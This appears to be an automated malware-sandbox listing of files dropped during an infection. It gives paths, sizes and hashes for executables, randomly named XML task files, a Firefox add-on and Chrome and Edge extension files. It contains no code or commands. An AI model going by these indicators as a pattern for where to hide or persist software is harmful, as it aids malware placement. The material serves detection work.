                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\BTngBackup\SyncBackupShell.exe
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                2.4MB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                585e122bd7c35b362fb53bc614cc969f

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                7a9e0cdacdd48ae058ef2c9d5e55f780175c7797

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                b27d8b75109ea7c18cd6e3112f2ef39bdbec15df58c9a0c349b514a53377c5d3

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                85d8c75a4ff53a09f8364ccfaf98602ae963eaa8d9126159b360070dffc3d68f98ee32d2208148b3d557bd387997d5475baf3f9bcd89d0fd27abba9468a32028

                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\BTngBackup\SyncBackupShell.exe
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                2.4MB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                585e122bd7c35b362fb53bc614cc969f

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                7a9e0cdacdd48ae058ef2c9d5e55f780175c7797

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                b27d8b75109ea7c18cd6e3112f2ef39bdbec15df58c9a0c349b514a53377c5d3

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                85d8c75a4ff53a09f8364ccfaf98602ae963eaa8d9126159b360070dffc3d68f98ee32d2208148b3d557bd387997d5475baf3f9bcd89d0fd27abba9468a32028

                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\CR DBF\CR_DBF.exe
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4.9MB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                79da488660a746317460186c7249b23d

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                2dac925d6ee81de84884cf6fa5bad5b4a742082c

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                f2ed309f8a47d4cf8193d656f3d27a5dacb216e1a4cf69d78e8eb8715cd8cc1a

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                28abf2d199a9f5258abb74d01b693f3c64e4e929a1bd1565d4d352317f12381a7368b14c06f493f94b4a300501721a84f51da45dac0cbfffc2de9706b2dfbce2

                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\CR DBF\CR_DBF.exe
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4.9MB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                79da488660a746317460186c7249b23d

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                2dac925d6ee81de84884cf6fa5bad5b4a742082c

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                f2ed309f8a47d4cf8193d656f3d27a5dacb216e1a4cf69d78e8eb8715cd8cc1a

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                28abf2d199a9f5258abb74d01b693f3c64e4e929a1bd1565d4d352317f12381a7368b14c06f493f94b4a300501721a84f51da45dac0cbfffc2de9706b2dfbce2

                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\CR DBF\RepairDbf.ini
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                25KB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                ccf1d4d1e6d0165843fa99d7416d4057

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                01bf656ee2bc12022c6ceeecfa68bc13144f7f99

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                748793d5e491729186a86db5c02e64e9abca22a9717835801f61fb848bea1c93

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                8967c145df96a62f67571032bcd8d6fd5e4c2d0cffc7c484c1932b3322a64f07baf60431457b813d65eb288a7a35fd00f856ce6931042c8780a5aeef52509483

                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\FaGkFfZLSayRC\TTadgqL.xml
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                d1cc45ee1071c96d9aaabdf507383135

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                04c4011023affe1e6d4dd3fc3d19fa95b3337efb

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                6e70180afe3e7fa355dc6878438fdebb2b03f941724e953feb5b3649ba6ca414

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                e3606d187652863f066edb7ef49e8c7a16c6aa732c2fea11cdaa1d1573ea1e0e356fbc8fd7ea1a6ab003eecd2deacf5adc2136584832a2df7011310c582c3d61

                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\JGBawXrjoobU2\kFUMGCg.xml
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                1a01b6bc545dc88f8db4da45906eba32

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                a0ad2056e9e3ecb9cc03a3e84809c249e04f1417

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                9f0485fc22ea811c0654c6b1794b7ef7adfa829b555fbcac6a4094a3cee27700

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                ab1824c9f56241eddc8f0c6fba17700348fe71dfc2563aed1bff78aa449e754a51a9d27c1c13f9530c0622ff8755eb8f3d4f2d4268f58d2f2e4955d23ee863e1

                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\YDZEHDnJqqKzehSUEKR\EuAqbId.xml
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                4fb09e9fe062cffe2873244e459220d5

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                5e4c90b5af48f796bab8a1aeb3ac03b39996cda1

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                cb3a1d4d6cadb683e0a0a4beb65176ac89d0da0d936f7e58733044688359dc1c

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                350674e53b7e42f8d3e6d4a9e887e8996eb258f5bb5ccc0ff2f89f1055845d4e30f155b31d26e68c7b21b3c29177d04c0b6eee91a0e526e30d0d632bb61a4246

                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4.8MB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                8c0c201f8984a39bbd3dc7c19abe58f8

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                67dfb8665d4636fa88131050ef6b4f820546d79b

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                142a1c432e3b87e7a13b0f12846cfe9f46c2a3a52d1bc8070b5596ce99ca62e3

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                84ca95ec160d88677388d83a490dc65d1d3f9e0aa9253b5ba070849d76453819ab6de283adcdc625f645b18be909067bea1b3c4a966607427fbca65a7382c5e2

                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4.8MB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                8c0c201f8984a39bbd3dc7c19abe58f8

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                67dfb8665d4636fa88131050ef6b4f820546d79b

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                142a1c432e3b87e7a13b0f12846cfe9f46c2a3a52d1bc8070b5596ce99ca62e3

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                84ca95ec160d88677388d83a490dc65d1d3f9e0aa9253b5ba070849d76453819ab6de283adcdc625f645b18be909067bea1b3c4a966607427fbca65a7382c5e2

                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4.8MB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                8c0c201f8984a39bbd3dc7c19abe58f8

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                67dfb8665d4636fa88131050ef6b4f820546d79b

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                142a1c432e3b87e7a13b0f12846cfe9f46c2a3a52d1bc8070b5596ce99ca62e3

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                84ca95ec160d88677388d83a490dc65d1d3f9e0aa9253b5ba070849d76453819ab6de283adcdc625f645b18be909067bea1b3c4a966607427fbca65a7382c5e2

                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\aHEACJvKU\XZPywfJ.xml
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                2dee969760daab4ee8658e3f0f42d2e6

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                a8e0aa83d746bed4076af7628fd6e80ea9a34abd

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                8b050d015cbe08cff15bc561395936c3481ff74936e662b1d867c7d92abc95f7

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                f7cfcd45b1d45f43cb2605798442134e6cc1b504cf9e457041492839fe32a3196aa0204f1c2a706ec7eeed28b2fe30e0a1cc9d15629f2a7da6e2edf431f3ae9f

                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\browser\features\{A5735E22-7BD8-4CED-A24E-FBBD2D9CABB9}.xpi
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                367KB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                0a39bc22fd99b0d9f87a0aeda6d4575d

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                53df9ab015f03b1d263364151f5960ed96b0f427

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                c1791a2c12f319b8a0ab414302d5e5b338e0a0960bb041a586e307e83fc00faa

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                7865b5afc93a069f6d6387b9a5c4a6fda167565b737b3b4bb8142485bb760c20deee4183df3a28ea6bec09c5015927be54caf8c53fd470e93d159e52a1055aa4

                                                                                                                                                                                                                                                                                                                              • C:\ProgramData\OWjgaygRnjJbmZVB\XenSpbs.xml
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                725b02f95193c5ac7f7d0f53be3411c8

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                a576d0124392e4a24137e7f614a21f2696ecf22b

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                efd62f579c86ce58710221612ab89f95e8ca321f82bda1081e92502bea637914

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                ebf41dac0da08c81f0609d384ec4cebc78df8488ee9212acd32f738bdb92ae4fa7cb25743a5a205c14d168a51147c88fe1f70b3c92319acc1e70a23f681c29d1

                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\iddmabhekhhonkmomaklnflhhgbfnioe\1.0.0_0\_locales\en\messages.json
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                150B

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                33292c7c04ba45e9630bb3d6c5cabf74

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                3482eb8038f429ad76340d3b0d6eea6db74e31bd

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\iddmabhekhhonkmomaklnflhhgbfnioe\1.0.0_0\_locales\pt_BR\messages.json
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                161B

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                5c5a1426ff0c1128c1c6b8bc20ca29ac

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                0e3540b647b488225c9967ff97afc66319102ccd

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                12KB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                834f7ad53a00e9ae6b37df5aecdeb370

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                4c340c3997a0d092fed64cbeee746b78c7e933c1

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                ad36e24c30bd3c6e31827db0327e0ae0f176c4a66c51819a74367508adb7aa5e

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                cf0c30ab650c390bb33d3d0413e3dcf94470d675ca946bd66fb4e5bc353e45d0e0694d17369c4ee226d06af0bd0a443ecf71cb0e7f6a4d3af600733948772517

                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                6cf293cb4d80be23433eecf74ddb5503

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                24fe4752df102c2ef492954d6b046cb5512ad408

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                152B

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                78c7656527762ed2977adf983a6f4766

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                21a66d2eefcb059371f4972694057e4b1f827ce6

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                e1000099751602ae1adcec6f1c74e1d65f472936817b45239dfed4b043984296

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                0a8e58ae95163b3cdf8e81b5085887761e73cb7c836a1a6a972e837fb3df69b2ac70cfd6311d06d40656344ec35eb48e512f007561480f0345486ac2b329be0b

                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                152B

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                099b4ba2787e99b696fc61528100f83f

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                06e1f8b7391e1d548e49a1022f6ce6e7aa61f292

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                cdb1db488e260ed750edfe1c145850b57ee8ab819d75237a167e673116a33ee8

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                4309375e10785564ceb03e0127ced414e366a5b833f16a60d796471d871b479e4c044db5268902d9dfd14715ca577cb26042bab8f7b0f31fe8abf33947feb9d1

                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_2
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                0962291d6d367570bee5454721c17e11

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                59d10a893ef321a706a9255176761366115bedcb

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                70KB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                e5e3377341056643b0494b6842c0b544

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                d53fd8e256ec9d5cef8ef5387872e544a2df9108

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ggnchfknjkebijkdlbddehcpgfebapdc\4.96_0\_locales\es\messages.json
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                186B

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                a14d4b287e82b0c724252d7060b6d9e9

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                da9d3da2df385d48f607445803f5817f635cc52d

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                1e16982fac30651f8214b23b6d81d451cc7dbb322eb1242ae40b0b9558345152

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                1c4d1d3d658d9619a52b75bad062a07f625078d9075af706aa0051c5f164540c0aa4dacfb1345112ac7fc6e4d560cc1ea2023735bcf68b81bf674bc2fb8123fb

                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                6B

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                a9851aa4c3c8af2d1bd8834201b2ba51

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                fa95986f7ebfac4aab3b261d3ed0a21b142e91fc

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                e708be5e34097c8b4b6ecb50ead7705843d0dc4b0779b95ef57073d80f36c191

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                41a1b4d650ff55b164f3db02c8440f044c4ec31d8ddbbbf56195d4e27473c6b1379dfad3581e16429650e2364791f5c19aae723efc11986bb986ef262538b818

                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                66a9e9a9eecead6d5bd20b4b76c635e9

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                9bd379211f123c067ef6b8842ca15d7e3cb1bf0d

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                a6f574a02ef014cac5633cd1c9f4e3bedeb958f21b3af68f9b3ef7afcf7bac38

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                31dd5437b6a0ad46a36ee69e33442a7f3d2d2ba265449b1254e5379016f76c25ce1c6b1fea8aedd6bcf935b81a1f06bccb212a51ab2742968137c440f04c668e

                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                626B

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                b97141b05148074c5ae6d10a089b9979

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                ff5b4a6c95caad4f68c3d34dbaacedddec550577

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                1b510f829621a2707fd2a3bca5c1b604b23da3c04ebc260cd5ce5cc0319319d7

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                5fa6a9c34e7a899408984895f69d10080f0487e69859418f871fdc97159f4d789668126c072572a7bd19484169f98f8f2234c625ea8aa9605f2794f7a0028ddc

                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                111B

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                285252a2f6327d41eab203dc2f402c67

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                d5965e60b70937e6ad29714763f4d6b4

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                c4518a8e8b4725731b6a12b9cc3f6e94cdab9228

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                3de7f4a57ff427797db28c5c282cd2ab883350c3303c01be8b21a7c9d2e78306

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                25cd43753cc2638f7d95c0f62c30b336fa43885059aa04c403a16f75d6365eaa0664276b2218d46e696818ff9c2bb2275ceb9fb3924c5c487ee63c464bd56ead

                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                6KB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                88a5899e95094acb9b809f2b52fa018c

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                e9256ce28906c3a56d93b50ebb2ac0a16925e35b

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                0eb798b212adbfea3bea76a39eb76c51a23649e72f0ba5c9478fd44d92af11fe

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                70ea64843779303079bfc5728fc7cf7d7245217e1fc206ba04f877f22aabe036c596ad21198000e4436ad62becc0494ed01c02cf7c1f0c7ac0bcb330f26c3aef

                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                12KB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                bbb40db6bdc48a14750f56fc3c5fef85

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                4e33f7e27b3ff501216d53b666cac51fc1bf2fed

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                93b4d7a323f1d4b4f8826cd7fa6c470cb43dafbf4cb010d1e9a3f5937dfe9ef1

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                27067b43351fda54ad660f91520dc542039ce9a3a5f0fcf41942a934d9bf021bd35d8d4db1cfb2358fe0186a948b3e2c9cf1518c0f7cbead081bcb45d4b2cc7d

                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                6KB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                88a5899e95094acb9b809f2b52fa018c

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                e9256ce28906c3a56d93b50ebb2ac0a16925e35b

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                0eb798b212adbfea3bea76a39eb76c51a23649e72f0ba5c9478fd44d92af11fe

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                70ea64843779303079bfc5728fc7cf7d7245217e1fc206ba04f877f22aabe036c596ad21198000e4436ad62becc0494ed01c02cf7c1f0c7ac0bcb330f26c3aef

                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                5KB

                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                ed308ca37114c79b47c9babb54725190

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                601170d97022a528a47eaf182b4de2bfbea36bf0

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                e5e0b254d72ba0f3bdabcd5a8dd3bcab82fde2f15a0097fade833b9c50b2e6bf

                                                                                                                                                                                                                                                                                                                                SHA512

